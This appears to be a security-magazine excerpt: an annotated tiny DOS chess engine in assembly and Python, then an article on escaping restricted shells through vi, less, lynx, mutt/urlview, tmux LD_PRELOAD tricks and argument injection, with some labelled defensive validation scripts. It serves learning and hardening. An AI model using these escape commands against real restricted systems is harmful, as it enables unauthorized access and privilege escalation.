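Python as an added example (this is not Baudsurfer's code). The piece letter
for each nibble value is inferred from the listing's comments, a purely
syntactic check stands in for the engine's chess-legality routine, and moves
are applied without legality checking.

```python
import re

# Constant and loop shape taken from the source listing:
#   mov cl,20h / a: mov eax,52364325h / rol eax,cl / and al,15
#   ... / sub cl,3 / loop a
BACK_RANK_PATTERN = 0x52364325

# Assumption: letters per nibble value, inferred from the listing's comments
# (pattern decodes to "rnbqkbnr", pawn value 1, White = Black value | 8).
PIECE_LETTERS = {1: "p", 2: "n", 3: "b", 4: "q", 5: "r", 6: "k"}

# Example gameplay string quoted in the article.
EXAMPLE_GAME = "h7h6h2h3g8f6h3h4f6g4h4h5g4h2g1h3h2f1h3g5"

# Stand-in for the engine's legality check: syntax only (assumption).
MOVE_RE = re.compile(r"[a-h][1-8][a-h][1-8]")


def rol32(value, count):
    """32-bit rotate left; x86 masks the count to 5 bits, so 32 rotates by 0."""
    count &= 31
    return ((value << count) | (value >> (32 - count))) & 0xFFFFFFFF


def decode_back_rank():
    """Emulate the init loop: one piece nibble per file, left to right."""
    pieces = []
    cl = 0x20
    while cl != 0:
        pieces.append(rol32(BACK_RANK_PATTERN, cl) & 15)
        cl -= 3  # sub cl,3
        cl -= 1  # loop a: decrement the counter, repeat while non-zero
    return pieces


def new_board():
    """Rows are listed top to bottom as ranks 1..8, as in the article's diagram."""
    back = [PIECE_LETTERS[v] for v in decode_back_rank()]
    board = [["."] * 8 for _ in range(8)]
    board[0] = back[:]                    # rank 1: Black back rank
    board[1] = ["p"] * 8                  # rank 2: Black pawns
    board[6] = ["P"] * 8                  # rank 7: White pawns
    board[7] = [c.upper() for c in back]  # rank 8: White back rank
    return board


def frame_moves(keystrokes):
    """Cut the input into fixed quartets, since validation runs every four chars.

    A single stray character therefore shifts every later quartet until the
    quartet is padded out. A trailing partial quartet is ignored here (the
    engine would keep waiting for more keys).
    """
    accepted, rejected = [], []
    for i in range(0, len(keystrokes) - len(keystrokes) % 4, 4):
        quartet = keystrokes[i:i + 4]
        (accepted if MOVE_RE.fullmatch(quartet) else rejected).append(quartet)
    return accepted, rejected


def square(text):
    """Map e.g. 'h7' to (row, col) with rank '1' as the top row."""
    return int(text[1]) - 1, ord(text[0]) - ord("a")


def replay(moves):
    """Apply file-first moves to a fresh board and return it as eight strings."""
    board = new_board()
    for move in moves:
        (r0, c0), (r1, c1) = square(move[:2]), square(move[2:])
        board[r1][c1], board[r0][c0] = board[r0][c0], "."
    return ["".join(row) for row in board]


if __name__ == "__main__":
    moves, _ = frame_moves(EXAMPLE_GAME)
    print("   A B C D E F G H")
    for rank, row in enumerate(replay(moves), start=1):
        print(rank, "", " ".join(row))
    # One stray key misaligns the quartets; three dummy keys realign them.
    print(frame_moves("xh7h6"))
    print(frame_moves("xzzzh7h6"))
```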

|=--[ Chesslin binaries

|=--[ Chesslin source code

;   "You don't need eyes to see You need vision." - Faithless       _
;   Special greets to : Impure ASCII 1940 and Divine Stylers!      | |
;   Greets : Alco Bon^2 BReWErS CODEX Flush Lineout Mandarine   .--' `--.
;   Onslaught Paranoimia Quartex Rebels Razor1911 RiOT Titan.   `--. .--'
;       _     _          _                _          _          ___| |___
; ______)\___ )\_________)\_______________)\_________)\        /         \
;/________ __\\  __________ _________ ____ /____ ____ /        \         /
;   ______)\\__  \____  ___)\_____  _)\  /(_____)\  /(____      \       /
; _/  _   _/  /   _   \_\____ _   \_\  \/    _/\  \/    _/       \     /
; \    \  \___\__  \        / \) __\___ __  /_\___ __  /_____   __>   <__
;  \    \_/     /   \      /   \/     /__\)_    _/__\)_     /  (___   ___)
;   \    /     /____/\    /\   /\    /   /\/    X   /\/    /      |   |
;   /_________/       \__/  \_______/_\____ ___/ \________/  ::::;|   |
;:                                 ___)\ __)\____________         |   |;: :
;.-------------------------------, \    \\_\ \_____ ____/ gRK     |   |
;\Red Sector Incorporated presents\ \    \_(__)_  _)\   ___      (     )
; \Chesslin minimalist chess engine\ \    \    (__)  \_/  /_    _/     \_
;  \A 256 bytes DOS tiny intro XPSP3\ \    \     \     _ / \   _>       <_
;   \For Phrack Magazine #0x45 _ 2016\ \    \/    \    \    \_(___________)
;;;;,\Coded by Baudsurfer\RSi  \\ &FU \ \   /\     \    \_____X___________>
;      `------------------------' `----'  \_/  \_____\___/
w equ word                ; 16-bit prettifying helper,Chesslin v1.0 in 2016
d equ dword               ; 32-bit prettifying helper,fasm assembler syntax
  org 100h                ; binary ip execution seg start address above psp
  pusha                   ; para down stack and avoid input buff collisions
  rep stosb               ; prepare board empty squares assumes ax=0 cx=255
  cwd                     ; set Black=0=top active player turn, White=8=bot
  xchg ax,di              ; shorter mov di,ax prepares writing segment base
  mov cl,20h              ; 32 initialization decoding bit rotations in all
a:mov eax,52364325h       ; back-rank "rnbqkbnr" nibble-encoded 32b pattern
  rol eax,cl              ; rotate next Black chess piece value in lsnibble
  and al,15               ; isolate a Black chess piece value from lsnibble
  stosb                   ; left-to-right write Black back-rank major piece
  mov [di+0eh],si         ; left-to-right write Black pawns assumes si=100h
  mov [di+5eh],bp         ; left-to-right write White pawns assumes bp=9xxh
  or al,8                 ; transforms Black back-rank major piece to White
  mov [di+6fh],al         ; left-to-right write White back-rank major piece
  sub cl,3                ; fixes back-rank pattern nibble rotation counter
  loop a                  ; file-by-file ranks init loops 20h/(3+1)=8 times
b:mov si,0fffbh           ; point source index to algebraic notation buffer
  push si                 ; shorter save of algebraic notation buffer start
  mov cx,4                ; print dword ascii algebraic notation buffer str
c:lodsb                   ; get one of four usr/cpu bytes from ascii buffer
  int 29h                 ; dos api fast console out display char al=[di++]
  loop c                  ; continue until ascii file-first pair chars left
  xor dl,8                ; alternate active player turn Black=0 or White=8
  pop di                  ; shorter restore algebraic notation buffer start
  jnz h                   ; if active player turn is White then do keyboard
  fldz                    ; else Black active player turn fpu load +0.0 cst
  fbstp [di-6]            ; and store back 80-bit packed bcd decimal number
e:mov si,0fff5h           ; zeroed this,best score 0fff5h and coords 0fff7h
  lodsw                   ; move lsb=potential capture vs. msb=best capture
  cmp al,ah               ; compare this capture value against best capture
  jc f                    ; prune calculations if capture already lower val
  call n                  ; else verify the attack potential chess legality
  jc f                    ; capture higher value but move was illegal chess
  mov [di-7],al           ; successful calculation thus store newer highest
  fild d [di]             ; successful calculation thus load current coords
  fistp d [si]            ; successful calculation thus store highest coord
f:inc d [di]              ; resume exploring exhaustive [0;0ffffh] interval
  jnz e                   ; including subset ["1a1a";"8h8h"] until finished
  mov cl,2                ; convert int32 to two file-first algebraic words
g:lodsw                   ; get first int16 msw/lsw algebraic notation word
  aam 16                  ; integer to expanded zero-based file/rank nibble
  add ax,2960h            ; translate file/rank to ascii chess board origin
  stosw                   ; write pair=half of the ascii move buffer string
  loop g                  ; get next int16 msw/lsw words algebraic notation
  jmp k                   ; and proceed examining ascii move buffer strings
h:mov si,di               ; di points to 0fffbh for both input and verifify
i:mov di,si               ; resets every input to algebraic notation buffer
  mov cl,4                ; one file-first algebraic notation is four bytes
j:cbw                     ; zero accumulator msb to set funct get keystroke
  int 16h                 ; al=dos bios keyboard services api blocking read
  stosb                   ; src file=fffb;rank=fffc dst file=fffd;rank=fffe
  loop j                  ; all file-first algebraic ascii quartet inputed?
  call n                  ; else verify algebraic ascii move is legal chess
  jc i                    ; if not then proceed to ask user input move anew
k:call l                  ; converts algebraic notation buffer ascii source
  push w b                ; redirect second fall-through return to printout
l:lodsw                   ; algebraic notation buffer ascii source then dst
  sub ax,3161h            ; convert to zero-based alphanumerical 3161h="a1"
  aad 16                  ; convert to x88 board representation (al+=ah*16)
  mov di,ax               ; add x88 chess board representation memory start
  test cl,cl              ; verify caller's asked mode is passive or active
  jnz m                   ; call asked mode mutex is passive so skip writes
  xchg [di],ch            ; call asked mode mutex is active so write board!
m:and al,88h              ; test if inside main chess board x88 bitmask use
  ret                     ; return to standard callers or printout redirect
n:pusha                   ; save reg vals in: si=fff7h/fffbh di=fffbh/ffffh
  mov si,0fffbh           ; point source index to current ascii move buffer
  mov cl,8                ; set passive mode count mutex for only verifying
  call x                  ; convert buffer ascii src pair to x88 memory add
  jz u                    ; source is non-conforming : illegal empty square
  xor dl,al               ; sets move conformitiy using active player color
  test dl,cl              ; test move conformity using active player colour
  jnz u                   ; source is non-conforming : opponent turn colour
  mov bx,di               ; else if source conforming then save piece addr.
  mov dh,al               ; else if source conforming then save piece value
  call x                  ; convert buffer ascii dest to x88 memory address
  jz o                    ; if move nature not an attack skip over captures
  xor dl,al               ; sets move conformitiy using active player color
  test dl,cl              ; test move conformity using active player colour
  jnz u                   ; destination is non-conforming : same turn color
o:sub di,bx               ; source & destination conforming so obtain delta
  mov [0fff5h],al         ; save piece value as non-transactional potential
  mov al,dh               ; restore previous saved move source piece nature
  and al,7                ; normalize gray piece nature colorless isolation
  test al,1               ; determine source piece's parity interval length
  jz p                    ; piece face=piece nature=piece value=piece score
  mov cl,4                ; override halfing default interval len if parity
p:cmp al,1                ; test if moving piece is a special handling pawn
  mov bx,y                ; piece memory address off-by-one index ret fixed
  xlatb                   ; move piece original start offset memory address
  xchg ax,di              ; offset becomes accumulator becomes displacement
  jnz s                   ; leave if move source piece not special handling
  test dh,8               ; else adjust move source pawn color displacement
  jnz q                   ; no White pawn displacement sub-interval fixings
  scasd                   ; displacement interval offset+=4 for black pawns
q:test ch,ch              ; verify if pawn is attacking an opponent piece ?
  mov cx,2                ; loop index clears msb placeholder also sets lsb
  jnz s                   ; if non-empty square : pawn attacking diagonally
  dec cx                  ; else decrease parity interval size special case
r:scasw                   ; displacement interval start+=2 prunes attacking
s:add di,bx               ; set displacement interval scanning start offset
  repnz scasb             ; verify move exists in displacement sub-interval
  jz v                    ; ZF set legal src piece displacement delta found
  jmp u                   ; illegal src piece displacement: delta not found
t:pop ax                  ; bail shotcircuits nested dataflow function call
u:stc                     ; carry mutex persists indicating move is illegal
v:popa                    ; persistant CF mutex is indicator to legal chess
  ret                     ; restore move mode mutex cl=passive or cl=active
x:call l                  ; verify this move legal within inside main board
  jnz t                   ; exits for illegal move piece outside main board
  cmpxchg [di],al         ; discriminate from special case zero return vals
y:db 195,21,7,19,15,15,15 ; p[1]PF4,n[2]PF8,b[3]PF4,q[4]PF8,r[5]PF4,k[6]PF8
z:db -33,-31,-18,-14,14   ; prev label is ret+1 parity displacement offsets
  db 18,31,33,-16,16,-1,1 ; z array is displacement overlap interval values
  db 15,17,-15,-17,-16    ; knight rook+8 bishop+12 pawns White+12 Black+18
  db -32,15,17,16         ; queen and king moves are rook+bishop+pawn moves


|=[ 0x03 ]=---=[ He Compels Secure Shells - DangerMouse ]=---------------=|


|=-----------------------------------------------------------------------=|
|=----------------------=[ He Compels Secure Shells ]=-------------------=|
|=-----------------------------------------------------------------------=|
|=------------------------=[ by DangerMouse ]=---------------------------=|
|=-----------------------------------------------------------------------=|


--[ Table of Contents

--[ Introduction
--[ Exploration - Primitive Gathering.
----[ Execution Primitive
----[ Write Primitive
----[ Read Primitive
--[ A real life example - freeshell.org
--[ A real life example - Private shell box
--[ Attacking the transport 
--[ Conclusion
--[ References
--[ Appendix A - Common commands with useful primitives
--[ Appendix B - psh Source code 

--[ Introduction

Welcome reader, in this small text we will look at a scenario which is
probably familiar to most of you. That is, breaking out of secure shells.

For those of you who don't know, a common scenario exists where an
administrator of some kind of device wishes to grant restricted access to
the functionality of that device. To accomplish this he/she will create a
shell (graphical or cli) which provides a subset of the features of the
system to the user. This may be as simple as replacing the user in
question's UNIX account shell with a custom written readline() loop which
executes options from a set list of commands.

There are numerous pit-falls associated with this practice which provide us
with a means to escalate our privileges from within the restricted shell.
In this write-up we will examine some of these pitfalls, as well as look at
the general process for investigating a restricted shell and eventually
breaking out to a higher entitled environment. To illustrate these points
we will look at some real life examples of secure shells and how we can
break them.

Some examples of pre-packaged, existing restricted shells are:
rbash/rssh/smrsh/rksh, however there also exists an endless array of custom
shells written for one off cases.

--[ Exploration - Primitive Gathering.

When investigating a secure shell environment, I find it best to
systematically explore each of the options within the shell looking to
collect certain primitives with which to elevate the options available.

----[ Execution Primitive

Typically the most useful primitive which we gain is the execute primitive.
Sometimes the ability to execute arbitrary commands is enough to break out
of the shell, for example executing a more complete shell such as bash from
within a restricted shell can often be enough to completely invalidate the
security of the system. Some examples of how to gain this primitive are:

 - Using the shell execute feature of many common shell commands, for
   example using the "!<shell command>" feature of the less pager.
 - Invoking the execution of a text editor (often defined by the EDITOR
   variable) from within another application. Then using shell execute
   features of the editor to escape. 
 - Combining other primitives to hijack execution of exposed applications.

Here is a commonly used example of using the vi command to gain an
execution primitive:

    ~$ vi
    :set shell=/bin/sh
    :shell
    bash$

From a GUI perspective, many years ago, after drinking at a conference we
decided it would be fun to create a game around breaking out from the many
netcafes which littered the streets at this time. These netcafes used to
provide a restricted Windows GUI with functionality removed, and the goal
was to race to break out, without using any real 0day.

Often in this scenario an easy win was provided by invoking the mirc32.exe
application (when it was whitelisted) and then using the /exec command to
invoke cmd.exe. Another option was to set the handler for telnet:// URIs
in the browser to cmd.exe and spawn it that way.

Another byproduct of using software in an unintended way is that the
security evaluation of the product technically neglects the perimeters that
are being exposed to an untrusted user. This means that often there are
trivial memory corruption bugs exposed in the application which go
unreported since even when people find them they do not care a great deal.

eg:

    $ perl -e'print "A"x50,"\n"' | ftp 
    Segmentation fault: 11

It is definitely worthwhile auditing some of the commonly included commands
in secure shells for easily triggerable memory corruption bugs, since these
can often be all that's needed to gain the execution primitive and win.

Another common method of gaining the execution primitive is to abuse
environment variable control to influence the dynamic linker. Typically
this means setting the LD_PRELOAD/DYLD_INSERT_LIBRARIES/Whatever variable
that provides a mechanism for injecting shared objects into a process as
soon as the dynamic linker loads. Obviously for this to work we also need a
write primitive beforehand to store the library we wish to load somewhere.
The tmux example later in the paper shows a real life case where this was
possible.

----[ Write Primitive

Obviously in some cases we cannot easily gain the execute primitive. In
these cases we are also looking for additional primitives which we can
leverage to eventually gain an execution primitive.

Finding a write primitive is usually pretty easy. Most applications need
some way to retain state between runs. Some examples are:

 - Input redirection operators ('>', '>>', '>|', '<>', '>&', '&>', etc)
 - Save ability of applications, text editors, etc
 - Log files

In one case I saw, a write primitive alone was enough to break out of the
restricted shell. By writing to a .unrestricted_user file within the home
directory of your user account, the next login was presented with a bash
shell. This is not typically the case though. 

When a write primitive is acquired it is also worth keeping in mind the
trick mentioned in [3]. If any of the invoked shell commands use wildcard
expansion on a directory, it can sometimes be possible to create files
beginning with the '-' character, to pass arguments to those commands.
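
The wildcard issue from [3], seen from the side of whoever maintains the
restricted shell (an added example, not part of the original article): the
first function lists option-like names in a directory the user can write
to, and the other two compare what a script passes with a bare * against
./*. All function names and the scratch directory are constructed.

```shell
#!/bin/sh
# Added example: file names that start with '-' in a user-writable
# directory, and the glob form that keeps them from being read as options.

# Print every entry directly inside $1 whose name begins with '-'.
find_option_like_names() {
    for path in "$1"/-*; do
        [ -e "$path" ] || [ -L "$path" ] || continue   # pattern matched nothing
        printf '%s\n' "${path##*/}"
    done
}

# Count the words a getopt-style parser would treat as options.
count_option_words() {
    n=0
    for word in "$@"; do
        case $word in
            -?*) n=$((n + 1)) ;;
        esac
    done
    echo "$n"
}

# What "cmd *" hands to cmd when run inside $1, versus "cmd ./*".
option_words_unsafe() { ( cd "$1" && count_option_words * ); }
option_words_safe()   { ( cd "$1" && count_option_words ./* ); }

# Constructed scratch directory standing in for one the user can write to.
make_sample_dir() {
    dir=$(mktemp -d) || return 1
    : > "$dir/report.txt"
    : > "$dir/-x"
    : > "$dir/--verbose"
    echo "$dir"
}

sample=$(make_sample_dir)
echo "option-like names: $(find_option_like_names "$sample" | tr '\n' ' ')"
echo "cmd *   -> $(option_words_unsafe "$sample") words parsed as options"
echo "cmd ./* -> $(option_words_safe "$sample") words parsed as options"
rm -rf -- "$sample"
```

Running the first function over upload and home directories of restricted
accounts is a cheap detection; the ./ prefix (or "--" before the glob) is
the fix in the scripts themselves.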

As you will see in the real life examples below, write primitives are
typically available in most applications, and can easily be leveraged in a
variety of ways to continue breaking out of the shell.

----[ Read Primitive

When talking about a read primitive, we need some way to read an arbitrary
file from the file system and display its contents on the screen.

Sometimes this can be relatively straightforward, for example in a shell
which uses /usr/bin/less as a pager, you can use the :e (examine) command
to open an alternative file. Often with less you can execute a command
with ! as well, but where you are unfamiliar with the file system, you can
use the e command to brute force the directory structure and find things
which are worthwhile executing.

Other applications are less straightforward. Sometimes the read primitive
may be filtered, or evaluated as a config file for the program. In these
cases, sometimes contents of the file can only be retrieved via error
messages. Basically whenever you see a file path being provided to an
application, you can test it with some known files to see if there is a way
to retrieve the contents.

Even when it is impossible to retrieve the contents of a file, sometimes a
program will respond differently when a file exists or not. This may be
easily noticed, or something subtle like return codes. This leak can be
used to map out the file system.

--[ A real life example - freeshell.org

Now that we've looked at a more generic approach to defeating secure
shells, we will look at some real world examples. The first is the
restricted shell "psh" which is used in the freeshell.org environment (SDF
Public Access UNIX System).

Before we get started looking at freeshell.org, I'd just like to say, I
have nothing but respect for freeshell.org. I have been playing with the
restricted shell on there for around 12 years, and have broken it a number
of ways. Several times I have contacted the admins to let them know. To me
this has provided a constantly evolving wargame which has been hours of
fun. 

The process of setting up an account on freeshell.org is really simple.
By ssh'ing into the freeshell.org box as the user "new" you are redirected
to a sign up process.

$ ssh new@freeshell.org

You will now be connected to NEWUSER mkacct server.
Please login as 'new' when prompted.

[RETURN] 

THIS MAY TAKE A MOMENT .. Trying 192.94.73.20...
Connected to 192.94.73.20.
Escape character is 'off'.

NetBSD/amd64 (ol) (pts/2)

login: new

Welcome to the SDF Public Access UNIX System - Est. 1987
You are the 79th guest today, logged in on 02-Sep-15 17:05:23.

Are you using Windows 2K or XP? (Y/N) N

------

This new user process takes us to the first restricted shell, FEP.
Typing `help` shows us the following menu:

FEP Command: help  

+--------------------------------------------------------------+
|COMMAND             | DESCRIPTION                             |
+--------------------------------------------------------------+
|what                | what is the SDF public access UNIX?     |
|w2k                 | important info for Windows 2k/XP users  |
|mkacct              | create your own UNIX shell account      |
|dialup              | US & Canada SDF dialup access           |
|teach               | for teachers and UNIX class instructors |
|traceroute  {host}  | map a route to a specified host         |
|whois       {host}  | list whois directory entry for a domain |
|ruptime             | display system status                   |
|finger      {user}  | check if a login is available           |
|software            | ported and installed software packages  |
|mil                 | information about our US Military Waiver|
|logout              | disconnect from sdf.org                 |
+--------------------------------------------------------------+

As you can see this provides us with some basic applications which we can
run, but also allows us to kick off the mkacct process to make our own
account. 

By running the finger command on our current user (new), we can see that
the new user has a shell of /sys/new/mkacct, which is the restricted shell
we are in.

FEP Command: finger new
Login: new                              Name: SDF newuser
Directory: /sys/new                     Shell: /sys/new/mkacct
On since Wed Sep  2 17:05 (UTC) on pts/2 (messages off)
No Mail.

The next thing we can see is that they have not sanitized the arguments to
finger. This means that we can pass arguments to the commands listed in the
menu. This is a common mistake that people make when making restricted
shells.

FEP Command: finger -?
finger: unknown option -- ?
usage: finger [-lmpshog8] [login ...]

If we enter finger by itself, we are prompted with the usage, rather than
displaying all users on the system logged in.

FEP Command: finger 
usage: finger {user}

However by passing in --, telling getopts to terminate arguments, we can
accomplish the same thing, and list users logged into the system.

FEP Command: finger --
Login    Name                Tty      Idle  Login Time   Office     Office Phone
new      SDF newuser        *pts/2       -  Wed 17:05    
smj      Stephen M. Jones    pts/0      33  Tue 21:39    
smj      Stephen M. Jones    pts/4      33  Wed 16:34 
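
One way a menu shell can close this hole, as an added example that is not
FEP's or psh's code: the argument must be a login name in full, and the
real binary is called with "--" in front of it. The function names,
FINGER_BIN and the weak check (inferred from the transcript above) are
assumptions; the login rule is the one quoted in the sign-up text below.

```shell
#!/bin/sh
# Added example: argument checking for one menu command of a restricted shell.
LC_ALL=C; export LC_ALL                 # byte-exact ranges in patterns

# Assumption: location of the real binary (overridable for testing).
FINGER_BIN=${FINGER_BIN:-/usr/bin/finger}

# Weak check, inferred from the transcript: only an empty argument is
# refused, so "-?" and "--" travel on to finger as options.
weak_check() {
    [ -n "$1" ]
}

# Strict check: the whole argument must be a login name as the sign-up text
# defines it (1 to 16 alphanumerics, a period allowed only in the middle).
valid_login() {
    case $1 in
        '' | *[!A-Za-z0-9.]* | .* | *.) return 1 ;;
    esac
    [ "${#1}" -le 16 ]
}

# Hypothetical dispatcher for one menu line such as "finger new".
fep_dispatch() {
    read -r cmd arg <<EOF
$1
EOF
    case $cmd in
        finger)
            if valid_login "$arg"; then
                # "--" ends option parsing, so the argument stays an operand
                # even if the pattern above is loosened later.
                "$FINGER_BIN" -- "$arg"
            else
                echo "usage: finger {user}"
                return 2
            fi
            ;;
        *)
            echo "unknown command"
            return 2
            ;;
    esac
}

verdict() { if "$@"; then echo accept; else echo reject; fi; }

# Constructed inputs: two logins, then the cases from the transcript.
for sample in 'new' 'a.b' '-?' '--' 'new -l' ''; do
    printf '%-9s weak=%-7s strict=%s\n' "[$sample]" \
        "$(verdict weak_check "$sample")" "$(verdict valid_login "$sample")"
done
```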

This shell is not the focus of the write-up however. Instead, if we run the
mkacct command, we are prompted for a user-name and password, and are able
to log into our shiny new psh shell.

---

You are about to create a UNIX shell account.  This account may be unlike
anything you've used before.  We urge you to carefully read all the text
displayed on your terminal, as it will aide you in your learning.
We also encourage you to try all the commands available with your new
account.  There are many types of games, applications and utilities
you will be able to instantly run in just a few moments.  If you are
looking for a particular command or version of a command that we do not
have, there are ways to request that it be installed.  We also offer DIALUP
and DSL in the USA and Canada which you will be able to learn about
shortly.  Be patient, read what is displayed - Explore and Enjoy!

[RETURN]

First, you need to choose a LOGIN.  A LOGIN allows you to LOG IN
to the system.  Your LOGIN can be 1 to 16 characters in length and
can be composed of alpha-numeric characters (middle period is OK).

What would you like to use for your login? 

...

Type 'help' for Commands.
Type 'com' to chat with other users.
Type 'ttytter' to listen to Twitter Tweets anonymously.
Type 'mud' to play the SDFmud.
Type 'mkhomepg' to set up your personal website.


Did you know you can become a permanent LIFETIME member of SDF
by making a onetime donation of $36?  Type 'arpa' for more info!

sdf:/udd/d/dangermouse> 
sdf:/udd/d/dangermouse> help
SDF psh Version 8 - *PREVALIDATED SHELL ACCOUNT*

 what         - what can I use this account for?
 unix         - a listing of UNIX commands available to you NOW
 how          - information on increasing membership
 teach        - using SDF in a classroom setting
 dialup       - information about SDF dialup service
 arpa         - about lifetime arpa membership
 bboard       - sdf user message boards
 commode      - chat with other users online
 ysm          - chat on the ICQ network
 bsflite      - chat on the AIM network
 msnre        - chat on the MSN network
 ttytter      - listen to Twitter tweets anonymously
 lynx         - browse the WWW textually or access GOPHER
 bksp         - set your BACKSPACE key
 faq          - frequently asked questions
 software     - display software programs installed on the system
 quote        - get a real time stock quote
 games        - a listing of available games
 thxmoo       - connect to the THXMOO
 mud          - connect to the SDFmud
 validate     - gain additional shell access (also try 'user' for details)

sdf:/udd/d/dangermouse>

----

As you can see, this shell gives us access to a variety of unix utilities
as well as the ability to perform some basic shell commands such as
cat/cd/etc. However this is a little deceiving as many of the commands are
filtered. We can change directory anywhere on the system, which is useful
for exploring the directory structure, however when we try to cat files to
view their contents we can see that only files in our home directory are
available.

The first method which I found for breaking out of psh revolved around 
the "lynx" text based web browser. My first thought was to open file://
based urls however they have disabled the ability to browse to arbitrary
locations.

My next thought was to spawn a shell with !, however when you attempt this,
the message "Spawning is disabled!" is shown. From this it was possible to
determine that lynx was being spawned with the "-restrictions=all" command
line argument. However, due to the nature of getopts() (the C library
function for parsing command line arguments) it is often possible to
re-enter the case associated for a particular argument. With this in mind
we could specify a new value for -restrictions, and spawn a shell with the
"!" key from within the new lynx. This has long been fixed in both lynx and
the SDF shell, psh.

The most recent way in which I escaped the psh shell was much more
complicated than the lynx method. The first step was to identify where the
source code for psh is located. Trying to change directory to an invalid
directory leaks this information, as seen below.

faeroes:/usr> cd doesnotexist
/usr/local/bin/psh[611]: cd: /usr/doesnotexist - No such file or directory

Next, I needed to view the source code of the psh, in order to look for
potential ways to escape. Attempting to use "cat" or "pico" to view this
file however, shows that they have placed restrictions around viewing files
outside of the home directory.

    sdf:/usr/local/bin> cat /usr/local/bin/psh
    usage: cat {filename}

Looking back at our list of possible applications to exploit for our
primitives I quickly fell upon the next most complex in the list, the
"mutt" mail client.

By pressing the E key on an email in mutt, it's possible to invoke the
command stored in the EDITOR environment variable, in the case of psh, this
is:

    EDITOR=/usr/pkg/bin/pico

However, since pico is executed from within mutt, the -o (sandbox) option
is not used. This means that from within the spawned pico process we can
read any file, giving us our read primitive. The current source code for
the psh shell is included in the appendix for you to learn from. In order
to read arbitrary files from pico, we simply press the ctrl+r (^R) key
combination and type a file-name. 

From within this pico execution we are also able to save files using the
ctrl+o hotkey (^O). This provides us an arbitrary write primitive, which
will come in useful for us later.

In the freeshell case, from within this environment we actually have the
ability to send email. This provides an easy way for us to exfiltrate
files. This can be done by reading a file (such as psh) into our pico
session, then mailing it to a mailinator address for extraction.

Now that we have read/write primitives, we need to leverage them to gain
an execution primitive. After much investigation, the way that I ended up
doing this was to abuse the urlview feature of mutt.

Mutt offers the ability to select an email message and hit the ctrl+b (^B)
hotkey in order to display a list of URLs within the email message. The
line in the config file which enables this is shown below.

^B       M |urlview\n      call urlview to extract URLs out of a message

As you can see, the email message is simply piped to the urlview
application. The description of this application from the manual page
describes urlview as:

       urlview  is  a  screen  oriented  program for extracting URLs from
       text files and displaying a menu from which you may launch a
       command to view a specific item.

From the man page we can see that urlview is driven from a configuration
file, either a system wide one "/etc/urlview.conf" or a local user copy 
"~/.urlview". This configuration file is worth investigation with our write
primitive to see what is available.

Again from the configuration file, we can see that the COMMAND option fits
our need. Its description is shown below.

COMMAND command
If the specified command contains a %s, it will be subsituted with the
URL that was requested, otherwise the URL is appended to the COMMAND
string. The default COMMAND is:

    url_handler.sh %s 

As you can see, all that's needed is to create a configuration file with
the following contents:

    COMMAND /usr/pkg/bin/bash # %s

This will cause urlview to append the url to the above line, and execute
it. Since a # is used prior to the %s the url will be treated as a
comment. This results in an unrestricted bash shell being executed when we
select an email message, press v followed by ctrl+b.

Once again this technique has been fixed, I will leave it as an exercise
for the reader to find a new one. Hopefully freeshell is not angry about
this since it is a learning exercise.

--[ A real life example - Private shell box

Recently a friend of mine set up a private ircd box for some semi-trusted
people. He created a chrooted environment where a user could ssh into a
box and be greeted with a tmux session containing a single window with the
irssi client inside it. I was unable to create a new window, or execute any
other commands. Irssi was heavily restricted using a configuration file,
stopping easy wins like /exec from within the irssi client.

After some trial and error, I settled into the tmux man page for
inspiration. tmux supports a variety of commands which can be entered by
pressing the tmux hotkey (ctrl+b) in this case and the : key. This provides
a small shell in which you can enter commands to tmux.

Reading the man-page, one of the first commands which stood out was as
follows:

 update-environment variables
    Set a space-separated string containing a list of environment variables
to be copied into the session environment when a new session is created or
an existing session is attached. Any variables that do not exist in the
source environment are set to be removed from the session environment (as
if -r was given to the set-environment command). The default is "DISPLAY
SSH_ASKPASS SSH_AUTH_SOCK SSH_AGENT_PID SSH_CONNECTION WINDOWID
XAUTHORITY".

To test this, I set the environment variable LD_PRELOAD to the value
/tmp/wut.so. Then I logged out and into the box. This resulted in a
segmentation fault upon connecting back as irssi tried to spawn, while
loading a shared library which didn't exist. Great, I'd found a bug, but
unfortunately I'd locked myself out of the shell. Since this was a test, I
could luckily ask my friend to restart my tmux session, however in a real
case this would have been trouble. Now I had the ability to load a dynamic
library of my choice, however without the ability to create one on disk, I
was still not any better off.

After reading the tmux man page a little more, I came across the commands
responsible for managing the paste buffers.

Specifically, it is possible to load a paste buffer from a file using the
command: 

 load-buffer [-b buffer-name] path

        (alias: loadb)

    Load the contents of the specified paste buffer from path.

With the paste buffer containing a file, you can then use:

 show-buffer [-b buffer-name]

        (alias: showb)

    Display the contents of the specified buffer.

This creates a new tmux window, containing the contents of the file you
loaded. This gives us the read primitive.

We can also use the command:

 save-buffer [-a] [-b buffer-name] path

        (alias: saveb)

    Save the contents of the specified paste buffer to path. The -a option
appends to rather than overwriting the file.

As you can see, this command allows us to write our buffer out to a
different file. To experiment with this, I copied a shared library that I
knew existed by loading it into the buffer, then writing it out to /tmp.
Then I set LD_PRELOAD, and validated that irssi did not crash.

The final command needed to break out of this shell is:

 set-buffer [-a] [-b buffer-name] [-n new-buffer-name] data

        (alias: setb)

    Set the contents of the specified buffer to data. The -a option appends
to rather than overwriting the buffer. The -n option renames the buffer to
new-buffer-name.

As you can see, this lets us manipulate the paste buffer in a more
fine-grained manner, in order to create a .so that we can abuse to get
controlled code execution.

As you can see, the methodology at play here is very similar to the
previous examples, but the actual technology at play was very different.

--[ Attacking the transport 

In some cases the restricted shell is just too restrictive, and it's just
not possible to gain any of these primitives. In these cases there are
still some things that are worth investigating. Sometimes you can attack
the protocol with which you are connecting to the system. The first
example is the shellshock vulnerability (sorry to use a buzzword).
Systems which are vulnerable to shellshock can sometimes be exploited to
execute bash commands prior to invoking the user's shell. This obviously
breaks out of the restrictive environment.

Another example is when the shell is dynamically linked (such as nologin,
typically). If the user is also given ftp access, or the ability to
otherwise write to their home directory, sometimes the .ssh/ directory can
be written to in order to create a config file, and if sshd is poorly
configured, this can allow the user to provide an LD_PRELOAD environment
variable to the ssh session, bypassing the nologin shell.
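
A check for the sshd case above, as an added example that is not part of
the original article. It assumes the poorly configured setting is sshd's
PermitUserEnvironment and the config file is ~/.ssh/environment, neither
of which the text names; the sample files and function names are
constructed.

```shell
#!/bin/sh
# Added example: does sshd import variables from a user-writable file?

# Print the PermitUserEnvironment value found in sshd_config file $1.
# sshd uses the first value it reads for a keyword and defaults to "no".
# Include files are not followed here.
permit_user_env() {
    awk '
        {
            line = $0
            sub(/^[ \t]+/, "", line)
            if (line == "" || substr(line, 1, 1) == "#") next
            cut = match(line, /[ \t=]/)      # keyword ends at blank or "="
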